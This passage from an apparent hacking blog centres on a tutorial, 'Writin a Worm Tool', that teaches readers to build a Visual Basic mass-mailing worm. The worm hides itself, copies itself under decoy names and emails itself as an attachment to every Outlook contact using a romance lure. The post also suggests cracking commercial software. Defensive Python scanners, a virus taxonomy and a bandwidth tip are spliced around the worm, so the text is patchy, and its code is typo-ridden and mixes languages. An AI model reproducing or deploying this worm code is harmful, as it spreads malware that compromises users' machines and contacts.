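    printf 'c:\\linux.bin="%s"\r\n' "$label" >> "$ini"
}

# Constructed sample: a 1 KiB all-zero "disk" with a valid signature at
# offset 510, standing in for a partition that LILO has written to.
make_sample_image() {
    img="$1"
    dd if=/dev/zero of="$img" bs=512 count=2 2>/dev/null
    printf '\125\252' | dd of="$img" bs=1 seek=510 conv=notrunc 2>/dev/null
}

# Stand-alone run: extract from the constructed image and check the result.
if [ "${0##*/}" != "sh" ] && [ -z "$BOOTSECTOR_NO_MAIN" ]; then
    work=$(mktemp -d)
    make_sample_image "$work/disk.img"
    extract_boot_sector "$work/disk.img" "$work/linux.bin"
    if is_valid_boot_sector "$work/linux.bin"; then
        echo "linux.bin looks like a boot sector; safe to add to boot.ini"
        add_boot_ini_entry "$work/boot.ini" "Slackware"
    else
        echo "linux.bin is NOT a valid boot sector; do not edit boot.ini" >&2
    fi
    rm -rf "$work"
fi
```

The signature check is deliberately strict: a file of the wrong length, or one copied from the wrong device (a blank or unformatted partition), fails it, which is exactly the case Step 7 describes where Windows boots but no Linux entry works.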

 
posted by VaTsAl at 8:30 pm | Permalink 0 comments
Writin a Worm Tool !

Writing a worm tool :)

A Worm is a simple and easy program that can spread by itself to other machines. What is the difference between a
Worm and a Virus? A Virus is a Program that can infect documents but must be sent by a person to be able to
spread. A worm can spread itself by Email and it can spread itself at any time. A Worm can be made in any
Programming Language available. Some of the programming Languages I would prefer to make a worm in are:

-Visual Basic
-C++
-Delphi
-Javascript
-Visual Basic Scripting

These Languages can all be used to make worms. Easier languages like Batch can also be used to make worms.
The worm has one main goal and that goal is to spread to another Machine. Some of the many ways of spreading
include:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits


These can all be used to spread a file to another machine. I usually use the Email, Binary Injection and File Sharing
Methods to spread my Worm. I am going to show you how to make a Worm in Visual Basic. Visual Basic is easy to
learn and is a beginner Language. What is nice about Visual Basic is once you have mastered it you are ready to
move up to a higher language such as C++. Visual Basic and Delphi are the same except for one major difference.
That difference is that Visual Basic requires the Runtime Files to run when Delphi doesn't. You can download and
crack programs such as www.Thinstall.com or www.Winzip.com and have your worm drop the runtime files, if your
worm is in Visual Basic.

Now the 1st thing we are going to do is show you what the worm we are going to create is going to perform. The
worm we are going to create is w32.N00bie. This worm is not very powerful but is good for the beginner. To be able
to create this worm you will need Microsoft Visual Basic. Visual Basic is a RAD or Rapid Application Builder. We
will now begin to make our 1st program in Visual Basic. Open up Visual Basic and select a Standard .exe Program.
Now, Visual Basic will load a window that is titled "Form1". This is the main form for Visual Basic. This is your
worm. Double click on the window labeled "form1" and you will see the below text

Private formsub_load()


End Sub

You will be coding between this text. (Image One shows an example of where you will be coding)



The 1st thing you will do is hide your worm. A worm must have stealth in order to be considered a "Real" Worm.
One way you can hide any Window in Visual Basic is the below code

Form1.Visible = False

That above code will make form1 Invisible Or you could do this

Me.hide

So, Now let's add Me.Hide into our code. So, the code in Visual Basic should now look like the below.

Private Sub form_Load()
Me.Hide
End Sub

Now, so far the only thing your worm will do is Hide itself from the user. So, now let's make the worm's heart. Now
I said above a worm must do SOME of the following things:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits

In this worm we are going to do Emailing, File Sharing and we will also do some DDoS Attacks and More with the
worm on a certain date. So, the 1st thing we want our worm to do is copy itself somewhere on the machine. Why you
may ask? This is a Good Question. The reason why is let's say that the worm is launched in the email attachment
but somehow it is deleted when the user restarts. Well, with a copy of the worm on the machine there is always a
good chance that the worm will be activated again. So let's have the worm copy itself a few times on the system.
So, this is the code to copy itself to other places on the machine. When I say copy itself I mean making an
exact copy of itself in another location with a different name. So, we are going to make this sample worm copy
itself to the C:\ Drive using the following File Names:

C:\Worm1.exe
C:\InnocentFile.exe
C:\Me.exe
C:\OpenMe!.exe

To have it copy itself under those file names to the C:\ drive we enter the following Visual Basic code. If
you study the code you will understand what it means; I have explained it in more detail below.

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

What does this code mean, piece by piece? I will explain it as best I can:

FileCopy - the Visual Basic statement that copies a file (source path first, destination path second).

App.Path + - the directory the running application was started from.

"\" - the path separator. App.Path has no trailing backslash (except for a drive root such as C:\), so without
it the source would read C:\Windows\DesktopWorme.exe instead of C:\Windows\Desktop\Worme.exe. Adding "\"
joins the directory and the file name correctly.

App.EXEName + - the base name of the running executable, without the .exe extension.

.exe - the file extension, appended to rebuild the full file name.

Once the source file is specified, you tell Visual Basic where to copy the worm to. That is the last part of the
line (the second argument, after the comma):

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

This is where we specify the destination. If you changed the last part to C:\Windows\Openme!.exe, the worm
would be copied to C:\Windows\Openme!.exe.

I hope I haven't confused you too much. Your Visual Basic code should now look like this

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
End Sub

Your worm now does the following:

Hides itself from the user (stealth)
Copies itself, byte for byte, to C:\Worm1.Exe, C:\InnocentFile.exe, C:\Me.exe and C:\OpenMe!.exe
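The copies above are byte-for-byte identical, which is exactly what a defender can key on: hashing every executable in the drive root groups the dropped files together however they are named. The script below is an added example, not code from this tutorial. It builds a throwaway directory with stand-in byte strings rather than real executables; the names Worm1.Exe, InnocentFile.exe, Me.EXE and OpenMe!.EXE come from the list above, and Defrag.exe is added as an unrelated control file.

```python
"""Find byte-identical copies of an executable dropped under different names.

Added defensive example, not code from the tutorial. The worm copies itself
verbatim to several file names, so a content hash groups the copies together
regardless of name. The sample 'drive' below is a constructed temp directory.
"""
import hashlib
import os
import tempfile
from collections import defaultdict


def sha256_of(path, chunk_size=1 << 16):
    """Return the hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def find_identical_copies(root, suffixes=(".exe",), min_copies=2):
    """Group files under `root` by content hash.

    Returns {hexdigest: sorted list of paths} for every group with at least
    `min_copies` members. Only names ending in one of `suffixes`
    (case-insensitive) are hashed; unreadable files are skipped, not fatal.
    """
    wanted = tuple(s.lower() for s in suffixes)
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(wanted):
                continue
            path = os.path.join(dirpath, name)
            try:
                groups[sha256_of(path)].append(path)
            except OSError:
                continue  # locked or unreadable: skip rather than abort the scan
    return {digest: sorted(paths) for digest, paths in groups.items()
            if len(paths) >= min_copies}


def build_sample_drive():
    """Constructed sample: a temp dir that looks like C:\\ after the worm ran.

    Returns (root, sorted paths of the dropped copies). The 'worm' is a
    stand-in byte string, not an executable. Defrag.exe is a different
    program used as a control, and notes.txt holds the same bytes under a
    non-executable name to show the suffix filter at work.
    """
    root = tempfile.mkdtemp(prefix="drive_")
    worm_bytes = b"MZ" + b"\x90" * 64 + b"N00bie-sample-not-a-real-binary"
    dropped = ["Worm1.Exe", "InnocentFile.exe", "Me.EXE", "OpenMe!.EXE"]
    for name in dropped:
        with open(os.path.join(root, name), "wb") as f:
            f.write(worm_bytes)
    with open(os.path.join(root, "Defrag.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 64 + b"unrelated-program")
    with open(os.path.join(root, "notes.txt"), "wb") as f:
        f.write(worm_bytes)
    return root, sorted(os.path.join(root, n) for n in dropped)


if __name__ == "__main__":
    root, _ = build_sample_drive()
    for digest, paths in find_identical_copies(root).items():
        print(digest[:16], "->", [os.path.basename(p) for p in paths])
```

Run it against a real drive root with `find_identical_copies("C:\\")`; a group of several same-hash executables with unrelated names in a location no installer writes to is worth a closer look. Hashing is content-based, so renaming or changing the extension does not hide a copy, only changing the bytes does.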

Now let's make your worm spread. The easiest way for a worm to spread is via email; email is the #1
spreading method for Internet worms. So let's add the email code to the program.

(Note: for the email code to work you will need to add a Windows Scripting Control to your project; otherwise
the worm will not perform the email task. You add a WSC the same way you add a Winsock control.)

Now add this Visual Basic scripting code to your program's code:

Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit

Now your worm emails itself. Be aware that when you compile, this VBS-style code may give you an error. If it
does, delete whichever line produces the error; it is usually the first one, Set so = CreateObject(fso). Delete
it and recompile. If it still doesn't work, troubleshoot and you will fix the problem. Your Visual Basic code
should now look like this


Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit
End Sub

Now you have a worm. Why is this a worm? A worm is a program that can email itself and infect other computers
without a person having to send it; the worm does it by itself.
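On the receiving side, the lure above is only dangerous because the mail carries an executable attachment, so that is what a mail gateway checks for. The following Python is an added defensive example, not code from the tutorial: it parses a message with the standard library and reports attachments that should be blocked, including the double-extension trick (a name like guide.doc.exe). The sample messages, the attachment names, the extension list and the two executable content types are constructed for the example; the subject line and lure text are the ones used above.

```python
"""Flag mail that carries an executable attachment, the worm's spreading vector.

Added defensive example, not code from the tutorial. Parses RFC 822 messages
with the standard library and reports attachments whose declared file name
has a dangerous extension (including double extensions) or whose MIME type
declares a Windows executable. Sample messages are constructed below.
"""
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows will execute on double-click (list chosen for the example).
DANGEROUS_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js"}
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec"}


def attachment_findings(raw):
    """Return [(filename, reason)] for attachments in `raw` (bytes) to block.

    Reasons: 'dangerous extension' when the final extension is executable,
    'double extension' when a document-looking name hides an executable
    extension (guide.doc.exe), 'executable content-type' when the MIME type
    itself declares a Windows binary even though the name looks harmless.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue  # container, not an attachment
        name = part.get_filename()
        if not name:
            continue  # inline body text has no file name
        pieces = name.lower().split(".")
        ext = "." + pieces[-1] if len(pieces) > 1 else ""
        if ext in DANGEROUS_EXTENSIONS:
            reason = "double extension" if len(pieces) > 2 else "dangerous extension"
            findings.append((name, reason))
        elif part.get_content_type() in EXECUTABLE_TYPES:
            findings.append((name, "executable content-type"))
    return findings


def build_sample_message(attachment_name, content_type=("application", "octet-stream")):
    """Constructed sample: the tutorial's lure mail carrying one attachment."""
    msg = EmailMessage()
    msg["From"] = "victim@example.com"
    msg["To"] = "friend@example.com"
    msg["Subject"] = "Fwd:None"
    msg.set_content("Do you want to surprise your wife or husband? "
                    "Sydney has made this awesome document, attached.")
    # Payload is a stand-in byte string, not a real binary.
    msg.add_attachment(b"MZ\x90\x00not-a-real-binary", maintype=content_type[0],
                       subtype=content_type[1], filename=attachment_name)
    return msg.as_bytes()


if __name__ == "__main__":
    for name in ["Worm1.exe", "romance-tips.doc.exe", "romance-tips.doc"]:
        print(name, "->", attachment_findings(build_sample_message(name)))
```

The check deliberately looks at the declared name and declared type separately: a sender controls both, so a gateway that trusts either one alone is bypassed by the other. In production this sits alongside content sniffing (an MZ header inside a ".doc") rather than replacing it.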


TYPES OF WORMS

Overwrite Method - the quickest way for a worm to infect programs on the machine: it simply overwrites them. The tutorial assumes every Windows computer has C:\Windows\Defrag.exe, so the worm copies itself over c:\windows\defrag.exe. The original program is destroyed in the process, which makes this method easy to notice.

Binary Infection - this method is not easy; binary work is hard for newcomers. Binary infection is where a worm, written in any language (yes, it is possible in batch), modifies the binary of a target program. Using the disk defragmenter again: the worm opens c:\windows\defrag.exe (the binary is like the DNA of a file; it controls what the program does) and writes its own code at the end or the beginning of the defragmenter's binary, so that each time the defragmenter runs, the worm runs with it from inside defrag.exe. This is a hard process to get right.

Injection into a Process - think of getting a shot at the doctor's office, say a Td (tetanus-diphtheria) shot. The shot injects inactivated material from the disease into your body so the immune system can examine it and build a defence. Code injection is similar in spirit: the worm puts its own code into a running process or into a file, where it then executes. It is hard to explain briefly, but it is another way a worm can spread.

Resident Viruses

This type of virus stays resident in RAM. From there it can intercept the operations the system carries out, corrupting files and programs as they are opened, closed, copied, renamed and so on.

Resident viruses can be treated as file infector viruses. Once a virus has gone memory resident it remains there until the computer is switched off or restarted, waiting for a trigger such as a specific date and time. In the meantime it sits in hiding, unless an antivirus can locate and remove it.

Examples include: Randex, CMJ, Meve, MrKlunky.



Direct Action Viruses

The principal aim of these viruses is to replicate and act when they are executed. When a specific condition is met, the virus infects files in the directory it is in and in the directories listed in the PATH of AUTOEXEC.BAT. On DOS and Windows 9x systems this batch file sits in the root directory of the boot disk and runs a set of commands when the computer starts.

Files infected with this type of virus can usually be disinfected and restored to their original condition, because the original content is still present inside the infected file.



Overwrite Viruses

This type of virus is characterized by the fact that it deletes the information contained in the files that it infects, rendering them partially or totally useless once they have been infected.

Infected files do not change size, unless the virus occupies more space than the original file, because instead of hiding within a file, the virus replaces the files content.

Since the original content is gone, the only way to clean a file infected by an overwrite virus is to delete it and restore it from a clean backup or from the original installation media.

Examples of this virus include: Way, Trj.Reboot, Trivial.88.D.



Boot Virus

This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

This kind of virus does not infect files but the disks that contain them. It first infects the boot sector of a floppy; when a computer is started from that floppy, the virus infects the boot sector (or master boot record) of the hard drive.

The best way to avoid boot viruses is to write-protect floppy disks and never start the computer with an unknown floppy in the drive.

Some examples of boot viruses include: Polyboot.B, AntiEXE.



Macro Virus

Macro viruses infect files created by applications that support macros. These include Word documents (DOC extension), Excel spreadsheets (XLS), PowerPoint presentations (PPT/PPS), Access databases (MDB), Corel Draw files, etc.

A macro is a small program that a user can associate to a file created using certain applications. These mini-programs make it possible to automate series of operations so that they are performed as a single action, thereby saving the user from having to carry them out one by one.

When a document containing macros is opened, they will automatically be loaded and may be executed immediately or when the user decides to do so. The virus will then take effect by carrying out the actions it has been programmed to do, often regardless of the program's built-in macro virus protection.

There is not just one type of macro virus, but one for each tool: Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft Access, Corel Draw, Lotus Ami Pro, etc.

Some examples of macro viruses: Relax, Melissa.A, Bablas, O97M/Y2K.



Directory Virus

An operating system finds files by looking up the path (composed of the disk drive and directory) in which each file is stored.

Directory viruses change the directory entries that record where a file is stored. When you run a program (a file with the extension .EXE or .COM) that has been infected, you are unknowingly running the virus, because the directory entry now points at the virus code while the original program's location has been moved aside by the virus.

Once the disk is infected, the original files can no longer be reached through their normal directory entries until the disk is disinfected.



Encrypted

Encryption is a technique viruses use to make detection by antivirus programs harder.

The virus encrypts its own body so that a signature scan of the stored file finds nothing familiar; before performing its task it decrypts itself in memory, and once the payload has run it stays encrypted on disk. The small decryption routine itself must remain in plain code, which is why scanners target that routine instead of the body.

Examples of encrypted viruses include: Elvira, Trile.



Polymorphic Virus

Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This defeats simple string or signature searches, because every copy differs after encryption, and it lets the virus produce a large number of distinct copies of itself. Scanners answer with emulation, heuristics and signatures on the decryption loop rather than on the body.

Some examples include: Elkern, Marburg, Satan Bug, Tuareg.
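Because an encrypted or polymorphic body differs in every copy, scanners look for what the encryption cannot hide: encrypted bytes are statistically close to random, while ordinary code and text are not. The script below is an added example, not from the page. It computes Shannon entropy over fixed-size windows of a constructed sample (a repeated plain-text "stub" followed by random bytes standing in for an encrypted body) and reports where the high-entropy region begins. The 512-byte window and the 7.0-bits-per-byte threshold are choices made for the example, not a vendor's settings.

```python
"""Shannon-entropy heuristic for spotting encrypted or packed regions.

Added example, not from the page. Encrypted and polymorphic bodies defeat
string signatures, but the encryption leaves a statistical trace: encrypted
bytes are near the 8-bit maximum entropy, plain code and text sit well below.
The sample file is constructed: a repeated plain 'stub' then random bytes.
"""
import math
import os
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte in `data` (0.0 for empty input, 8.0 maximum)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data, window=512, threshold=7.0):
    """Return (offset, entropy) for each `window`-sized slice at or above `threshold`.

    Scanning in windows rather than over the whole file matters: a plain
    header or a small decryptor stub would dilute a whole-file average, and
    the window offsets show *where* the encrypted region sits.
    """
    hits = []
    for off in range(0, len(data), window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def build_sample(plain_len=1024, body_len=4096):
    """Constructed sample: plain 'stub' text, then random bytes as the encrypted body.

    Returns (sample_bytes, offset where the random body starts).
    """
    seed = b"mov eax, ebx ; decryptor stub loop xor [esi], al ; inc esi ; loop "
    stub = (seed * (plain_len // len(seed) + 1))[:plain_len]
    body = os.urandom(body_len)  # stands in for an encrypted virus body
    return stub + body, plain_len


if __name__ == "__main__":
    sample, boundary = build_sample()
    print("whole-file entropy: %.2f bits/byte" % shannon_entropy(sample))
    hits = high_entropy_windows(sample)
    print("first high-entropy window at offset %d (body starts at %d)" % (hits[0][0], boundary))
```

Entropy is a heuristic, not a verdict: compressed archives, images and legitimately packed installers score just as high, so in practice the result is combined with other evidence (an executable whose code section is high-entropy and whose imports are almost empty is a stronger signal than either alone).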



Multipartite Virus

These advanced viruses can create multiple infections using several techniques. Their objective is to attack any elements that can be infected: files, programs, macros, disks, etc.

They are considered fairly dangerous due to their capacity to combine different infection techniques.

Some examples include: Ywinz.




File Infectors

This type of virus infects programs or executable files (files with an .EXE or .COM extension). When one of these programs is run, directly or indirectly, the virus is activated, producing the damaging effects it is programmed to carry out. The majority of existing viruses belong to this category, and can be classified depending on the actions that they carry out.



Companion Viruses

Companion viruses can be considered file infector viruses like the resident or direct action types. They are known as companion viruses because, once in the system, they "accompany" files that already exist rather than modifying them. The classic DOS technique is to create a .COM file with the same base name as a target .EXE: because DOS runs the .COM before the .EXE when only the name is typed, the virus runs first and then starts the original program. To carry out their infection routines, companion viruses can wait in memory until a program is run (resident) or act immediately by making copies of themselves (direct action).

Some examples include: Stator, Asimov.1539, Terrax.1069



FAT Virus

The file allocation table (FAT) is the part of a disk that records which clusters belong to each file; it is vital to the normal functioning of the computer.

This type of virus attack can be especially dangerous, by preventing access to certain sections of the disk where important files are stored. Damage caused can result in information losses from individual files or even entire directories.



Worms

A worm is a program very similar to a virus: it self-replicates and can have negative effects on your system, and, like viruses, it is detected and removed by antivirus software. However, worms are not strictly viruses, as they do not need to infect other files in order to reproduce.

Worms can exist without damaging files, and can reproduce at great speed, saturating networks and causing them to collapse.

Worms almost always spread through e-mail, networks and chat (such as IRC or ICQ). Some exist only in a computer's memory, without writing a file to disk.

Some examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.



Trojans or Trojan Horses

Another unsavory breed of malicious code are Trojans or Trojan horses, which unlike viruses do not reproduce by infecting other files, nor do they self-replicate like worms.

Trojans work in a similar way to their mythological namesake, the famous wooden horse that hid Greek soldiers so that they could enter the city of Troy undetected.

They appear to be harmless programs that enter a computer through any channel. When that program is executed (they have names or characteristics which trick the user into doing so), they install other programs on the computer that can be harmful.

A Trojan may not show its effects at first, but when it does it can wreak havoc on your system. Trojans can delete files, destroy information on your hard drive and open a backdoor to your system, giving an outside user access to copy confidential information and send it elsewhere.

Some examples of Trojans are: IRC.Sx2, Trifor.




Logic Bombs

They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.



False Viruses

These messages are often mistaken for viruses but are something else entirely. It is important to know the difference between a real virus threat and a false one.

Hoaxes are not viruses, they are false messages sent by e-mail, warning users of a non-existent virus. The intention is to spread rumors causing panic and alarm among users who receive this kind of information.

Occasionally, hoax warnings include technical terms to mislead users. On some other occasions, the names of some press agencies are mentioned in the heading of the warnings. In this way, the hoax author attempts to trick users into believing that they have received a warning about a real virus. Hoaxes try to fool the user into performing a series of actions to protect themselves from the virus, sometimes leading to negative results.

Users are advised not to pay attention to these misleading warnings and delete these messages once received without sending them to others.








 
posted by VaTsAl at 8:28 pm
Speed up your internet by 20%

A widely circulated tip claims that Windows reserves 20% of your available bandwidth for Microsoft's own purposes (Windows Update and the like) and that you can "get it back". The setting exists, but the claim is a misreading of it: the QoS Packet Scheduler lets QoS-aware applications reserve up to 20% of a link's bandwidth, and when no application has made such a reservation the whole link is available to ordinary traffic. Changing the limit therefore does not make normal downloads faster. For the record, this is the setting the tip refers to.

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy
then Computer Configuration
then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

Double-click Limit Reservable Bandwidth. It shows "Not configured", and the Explain tab says: "By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
The tip is to ENABLE the setting and set the limit to ZERO, so that no application can reserve anything. This is harmless, but it changes nothing unless you actually run software that requests QoS reservations. gpedit.msc is not included in Windows XP Home; the same policy is stored as the NonBestEffortLimit DWORD under HKLM\SOFTWARE\Policies\Microsoft\Windows\Psched, and the policy also applies on Windows 2000.








 
posted by VaTsAl at 7:26 pm